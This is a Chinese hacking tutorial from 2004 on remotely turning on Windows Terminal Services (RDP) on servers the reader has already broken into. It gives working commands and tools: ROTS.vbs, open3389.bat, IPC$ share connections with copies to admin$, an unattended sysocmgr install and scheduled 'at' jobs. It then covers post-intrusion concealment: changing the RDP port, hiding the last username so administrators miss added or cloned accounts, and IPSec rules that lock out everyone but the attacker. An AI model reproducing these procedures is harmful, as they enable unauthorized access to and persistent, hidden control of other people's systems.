在漏洞不段出現的今天，入侵一臺服務器已經不是什么新鮮事，但凡是入侵成功之后，都想盡辦法來打開終端服務，什么是終端呢？又怎么在遠程打開呢？看完本文，你就會成為一個開“終端的高手”。

文：終端服務全攻略 
作者：dahubaobao
主頁：http://www.ringz.org 
郵件：dahushibaobao@vip.sina.com 
QQ：382690
發表于黑客防線2004年1期
工具及圖片都在壓縮包中，解壓密碼：www.ringz.org 
http://dahubaobao.go.nease.net/Terminating.rar 
歡迎進入環形區，一群技術狂熱者的社區，www.ringz.org歡迎你的加入！
=====================================================================
終端服務全攻略

在漏洞不段出現的今天，入侵一臺服務器已經不是什么新鮮事，但凡是入侵成功之后，都想盡辦法來打開終端服務，什么是終端呢？又怎么在遠程打開呢？看完本文，你就會成為一個開“終端的高手”。

什么是終端服務
3389又稱Terminal Service，服務終端。在WindowsNT中最先開始使用的一種終端，在Win2K的Professional版本中不可以安裝，在Server或以上版本才可以安裝這個服務，其服務端口為3389。由于使用簡單，方便等特點，一直受系統管理員的青昧。也正式因為他的簡便，不產生交互式登陸，可以在后臺操作，因此也受到了黑客朋友的喜愛，事實可以說明，現在大多數朋友在入侵之后，都想打開windows終端服務，甚至不惜重啟對方的計算機，也要把終端服務安裝上，由此可見他的普遍性。另，在在XP系統中又叫做“遠程桌面”。

打開終端服務的各種方法
下面進入正題，開始今天的“終端”之旅。（各種工具我會提供）
一， 使用ROTS.VBS腳本
插撥廣告：
1， 什么是VBS
VBScript的全稱是:Microsoft Visual Basic Script Editon.(微軟公司可視化BASIC腳本版). 正如其字面所透露的信息, VBS(VBScript的進一步簡寫)是基于Visual Basic的腳本語言. 我進一步解釋一下, Microsoft Visual Basic是微軟公司出品的一套可視化編程工具, 語法基于Basic. 腳本語言, 就是不編譯成二進制文件, 直接由宿主(host)解釋源代碼并執行, 簡單點說就是你寫的程序不需要編譯成.exe, 而是直接給用戶發送.vbs的源程序, 用戶就能執行了。

知道什么是VBS了，下面開始進行測試。首先你要獲得這臺主機的Administrator權限或Local System權限，具體怎么獲得在這不必討論。先來看看ROTS.VBS幫助.。(見圖1)
ROTS v1.01
Remote Open Terminal services Script, by zzzEVAzzz
Welcome to visite www.isgrey.com 
Usage:
cscript c:\scriptpath\ROTS.vbs targetIP username password [port] [/r]
port: default number is 3389.
/r: auto reboot target.

一般的命令格式：ROTS.vbs <目標IP> <用戶名> <密碼> [服務端口] [自動重起選項]。

下面打開本地CMD，輸入：ROTS.vbs XXX.XXX.XX.XXX dahubaobao dahu 3389 /fr

注意：
1，/fr為強制重啟，/r為普通重啟，不要搞混了。
2， 腳本會判斷目標系統類型,如果不是server及以上版本,就會提示你是否要取消。

優點：成功率高。
缺點：必須重新啟動。
二，使用批處理（bat）
open3389.bat，先來看看幫助：（見圖2）
*******************Open3389*********************
使用方法：
open3389.bat ip user password
open3389.bat 目標ip 用戶名 密碼
還是打開CMD，輸入：open3389.bat XXX.XXX.XX.XXX dahubaobao dahu

好了 就這樣來打開3389，bat文件真的很好用，建議大家去學習。

優點：不必重新啟動。
缺點：成功率不高。

三， 使用HBULOT
這個工具要上傳到對方的機器，然后執行，比較麻煩。
C:\>net use \\XXX.XXX.XX.XXX\IPC$ "dahu" /user:"dahubaobao" //建立IPC連接
C:\>copy HBULOT.exe \\ XXX.XXX.XX.XXX \WINNT\admin$ //上傳到對方的systeme32目錄下。
C:\>net use \\XXX.XXX.XX.XXX\IPC$ /del //斷開IPC

然后telent過去，到對方的WINNT\systeme32目錄下，直接運行HBULOT.exe即可（見圖
3）。 
---------------------------------------------------------------------------------------------------------------

下面介紹的不需要工具，具體請看我的方法
首先telent過去，然后輸入query user，使用這個命令的前提是安裝終端，如果出現如圖4
的情況，就表明安裝了終端。如果沒有，那就證明沒有安裝，請看我是怎么做的：

C:\> dir c:\sysoc.inf /s //查找sysoc.inf文件的位置 
c:\WINNT\inf 的目錄

2003-06-19 12:05 3,458 sysoc.inf
1 個文件 3,458 字節

C:\>dir c:\sysocmgr.* /s //查找組件安裝程序
c:\WINNT\system32 的目錄

1900-10-29 04:00 42,768 sysocmgr.exe
1 個文件 42,768 字節

C:\>echo [Components] > c:\ts 
C:\>echo TSEnable = on >> c:\ts
//建立無人職守安裝的參數
C:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\ts /q
開啟3389，并且重新啟動，如果
C:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\ts /q /r
開啟3389，不重新啟動。

如果重新啟動，那等幾分鐘就可以用客戶端連接了，如果沒重新啟動，那就要等對方重新啟動之后，才能連接（看你的耐心嘍）。
----------------------------------------------------------------------------------


在介紹一種很方便的做法，就是做一個bat文件，在本地運行即可，下面是bat的內容
echo [Components] > c:\ts

echo TSEnable = on >> c:\ts

C:\sqlsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\ts /q

net use \\ip\ipc$ dahu /user:dahubaobao

copy 路徑:\xxx.bat \\ip\winnt\admin$

at time 00:00:00 xxx.bat

主機執行之后，會自動重啟，之后就可以利用3389登陸了。

這個bat文件很容易，前兩條語句是“建立無人職守安裝的參數”，第三條是真正的“開啟終端的命令”，第四條是“IPC連接”，第五是“把bat文件copy到對方的winnt\system32目錄下”，最后是用“time獲取時間，然后用at命令啟動。”

（個人推薦這種方法，比較簡單，有點IPC知識的就可以實現。）


修改終端服務端口
這一步很重要，我們辛苦的開啟了終端服務，不能因為“3389”的暴露而前功盡棄，所以端口是必須修改的，先說一下原理，終端服務安裝完成后，會在注冊表中增加兩個鍵，其鍵值分別為16進制的3389，即“0x00000D3D”。現在打開“運行”，輸入“regedit”啟動注冊表編輯器，然后打開HKEY-LOCAL_MACHINE\System\CurrentControlSet\Control\TerminalServer\Wds\Repwd\Tds\Tcp和HKEY-LOCAL_MACHINE\System\CurrentControlSet\Control\TerminalServer\WinStartions\RDP-TCP子鍵，修改“PortNumber”，假如我們修改成8080端口，其鍵值為“1F90”，保存退出，注意，重啟之后才能生效，修改完成之后，會到本地，打開客戶端，輸入：XXX.XXX.XXX.XX:8080，就可以連接了。（見圖5，6）

有的朋友對注冊表不熟悉，更有甚者恐懼注冊表，認為是很難駕御的地方，那好辦，下面介紹一個小工具，可以在命令行下修改端口，看我是怎么做的：還是先來看幫助
=======================================================
Change Local or Remote TermService Port Program
Code By wawa@21cn.Com Http://www.Haowawa.Com 
=======================================================
Local Usage: c3389 7358
Remote Usage: c3389 \\192.168.0.1 adminname password 7358

Local Host TermService Port is : 3389

本地修改：c3389 端口
遠程修改：c3389 \\XXX.XXX.XXX.XX Admin用戶 密碼 端口

先來看本地修改：
打開CMD。輸入c3389 post，具體見圖7。

在來看遠程修改：
輸入c3389 \\XXX.XXX.XXX.XX adminname password post。

到這里，端口就修改關閉了。

隱藏上次登陸過的用戶名
在終端安裝完成后，并且你已經登陸過，那么再次登陸就會顯示上次登陸過的用戶名，如果我們添加的帳戶（或克隆）被管理員看到了，那不起疑心才怪呢？所以我們要隱藏登陸過的用戶，要實現隱藏，還是要修改注冊表，具體看我怎么做：在“運行”中輸入“regedit”啟動注冊表編輯器，依次展開：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon子鍵下的DontDisplayLastUserName，默認鍵值為“0”，我們修改為“1”，保存，退出，重新啟動之后生效。見圖8


限制/指定連接終端的地址
現在我們已經給肉雞看了終端，并且修改了端口，還做了一些簡單的維護，但這還是不夠的，假如某人知道了我們修改過的端口就是終端服務，那就掛了，所以還要在肉雞上通過IPSEC這個系統自帶的而且功能非常強大的工具來做一下限制，具體請看我的演示：

1，靜態IP
假如我的IP是111.222.255.255，我們通過設置IPSEC，來讓肉雞上的終端只通過我的連接，而拒絕除了我以外的所有連接，好，就這么辦，先登陸終端，然后打開“管理工具”—“本地安全設置”，設置如下：

首先右鍵點擊“IP安全策略 在本地機器”選擇“創建IP策略”，然后打開了一個向導，即“IP安全策略向導”—“下一步”—“名稱”—“下一步”取消“激活默認響應規則”—“下一步”—“完成”，這是會重新打開一個“新IP安全策略 屬性”（見圖9），取消“使用“添加向導””—“添加”—出現“新規則屬性”—“添加”—出現“IP篩選器列表”—取消“使用“添加向導””—“添加”—出現“篩選器 屬性”，選擇“尋址”標簽，源地址設為‘任何IP地址’，目的地址設為‘我的IP地址’；在選擇“協議”標簽，選擇協議類型設為‘TCP’，設置IP協議端口‘從任意端口’—‘到此端口8080’—“確定”（見圖10，11）--“關閉”—回到“新規則 屬性”—選擇“新IP篩選器列表”—在選“篩選器操作”標簽—取消“使用“添加向導””—“添加”—在“安全措施”標簽下選擇“阻止”—“確定”—“關閉”（見圖12），回到“新規則 屬性”—選中“新篩選器操作”—“關閉”—“關閉”—回到“本地安全設置”—選中“新IP安全策略”—右鍵點擊“指派”（見圖13），好了，總算設置完了，這樣所有的機器就無法連接8080（終端）端口了。

注意：以上都是使用默認的名稱，所以大家在設置的時候注意一下。

由于上邊的設置，把我自己也擋在了外面，這可不是我所想要的，所以，我們還要建立一條規則，允許我的IP 111.222.255.255訪問對方的8080端口，方法如下：

右鍵點擊“新IP安全策略”—“屬性”—不選“使用“添加向導””—出現“新規則 屬性”—“添加”—出現“IP篩選器列表”—不選“使用“添加向導””—“添加”—出現“篩選器 屬性”—選擇“尋址”標簽，設置成如圖14的樣子，在選擇“協議”標簽，設置成如圖12的樣子，然后“確定”—“關閉”—回到“新規則 屬性”—選中“新IP篩選器列表（1）”—在選“篩選器操作”標簽—在選“允許”—“關閉”—“關閉”—回到“本地安全設置”。
（見圖15）

2，動態IP

在中國，擁有靜態IP的人畢竟是少數，大多數朋友還都是撥號，雖然現在ADSL很普遍，但ADSL還是虛擬撥號，即動態IP，所以用上邊的方法設置IPSEC肯定是不行的，所以，現在我們要修改上邊的一條規則，使IPSEC可以通過 特定子網的連接，方法很簡單，其他的都不用改，按照圖16的方法設置就可以了。